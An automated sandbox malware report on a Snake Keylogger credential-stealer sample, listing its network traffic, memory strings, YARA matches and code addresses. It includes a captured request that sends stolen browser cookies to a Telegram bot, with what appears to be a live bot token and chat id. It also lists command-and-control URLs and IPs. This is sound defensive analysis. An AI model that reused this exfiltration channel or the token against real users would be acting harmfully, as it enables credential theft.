Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: smtp.hostinger.com
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcea7e323b4b56Host: api.telegram.orgContent-Length: 1257Connection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 20:41:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 20:41:26 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: EUYIlr7uUX.exe, 00000000.00000002.1440364137.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 00000008.00000002.1472091436.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ECC000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.hostinger.com
Source: EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: EUYIlr7uUX.exe, 00000007.00000002.3899571109.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20a
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193
Source: EUYIlr7uUX.exe, 00000007.00000002.3899571109.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EUYIlr7uUX.exe, 00000007.00000002.3899571109.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: EUYIlr7uUX.exe, 00000007.00000002.3899571109.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002DAA000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: EUYIlr7uUX.exe, 00000007.00000002.3899571109.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/p

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52199
Source: unknown	Network traffic detected: HTTP traffic on port 52195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 52186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52201
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 52183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52179
Source: unknown	Network traffic detected: HTTP traffic on port 52177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52177
Source: unknown	Network traffic detected: HTTP traffic on port 52193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52181
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 52201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52189
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52195
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49750 version: TLS 1.2

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.qggKEJlcsFa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.qggKEJlcsFa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: EUYIlr7uUX.exe PID: 7436, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_02C7D304	0_2_02C7D304
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_06F3C580	0_2_06F3C580
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_06F33D50	0_2_06F33D50
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_06F353F8	0_2_06F353F8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_06F338F8	0_2_06F338F8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_06F35830	0_2_06F35830
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_06F35820	0_2_06F35820
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_06F36108	0_2_06F36108
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_08DA2EC0	0_2_08DA2EC0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_08DA34A8	0_2_08DA34A8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_08DAAE98	0_2_08DAAE98
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_08DAAEA8	0_2_08DAAEA8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00B4A978	7_2_00B4A978
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8C147	7_2_00E8C147
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8D278	7_2_00E8D278
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E85362	7_2_00E85362
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8C468	7_2_00E8C468
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8C738	7_2_00E8C738
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E869A0	7_2_00E869A0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8E988	7_2_00E8E988
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8CA08	7_2_00E8CA08
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8CCD8	7_2_00E8CCD8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E89DE0	7_2_00E89DE0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E86FC8	7_2_00E86FC8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8CFA9	7_2_00E8CFA9
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8F961	7_2_00E8F961
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8E97B	7_2_00E8E97B
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E83E09	7_2_00E83E09
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00F80FC8	7_2_00F80FC8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00F85839	7_2_00F85839
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00F86DD9	7_2_00F86DD9
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00F84308	7_2_00F84308
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659E258	7_2_0659E258
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06592288	7_2_06592288
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06590B30	7_2_06590B30
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06591BA8	7_2_06591BA8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06599C70	7_2_06599C70
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659FC68	7_2_0659FC68
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06595028	7_2_06595028
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06599548	7_2_06599548
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06592970	7_2_06592970
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659E24A	7_2_0659E24A
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06592278	7_2_06592278
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659DE00	7_2_0659DE00
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659EAF8	7_2_0659EAF8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659E6B0	7_2_0659E6B0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659E6AF	7_2_0659E6AF
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659EF51	7_2_0659EF51
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06591B77	7_2_06591B77
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659EF60	7_2_0659EF60
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659EB08	7_2_0659EB08
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06599328	7_2_06599328
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06590B20	7_2_06590B20
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06599BFA	7_2_06599BFA
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06598B91	7_2_06598B91
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659F3B8	7_2_0659F3B8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06598BA0	7_2_06598BA0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06590040	7_2_06590040
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_06595018	7_2_06595018
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659F810	7_2_0659F810
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659F802	7_2_0659F802
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659003F	7_2_0659003F
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659D0F8	7_2_0659D0F8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659CCA0	7_2_0659CCA0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659D550	7_2_0659D550
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659D540	7_2_0659D540
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659DDFF	7_2_0659DDFF
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659D999	7_2_0659D999
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_0659D9A8	7_2_0659D9A8
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_0298D304	8_2_0298D304
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_050A7A40	8_2_050A7A40
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_050A0006	8_2_050A0006
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_050A0040	8_2_050A0040
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_050A7A31	8_2_050A7A31
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_06D46108	8_2_06D46108
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_06D42E90	8_2_06D42E90
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_06D4AE97	8_2_06D4AE97
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_06D4AEA8	8_2_06D4AEA8
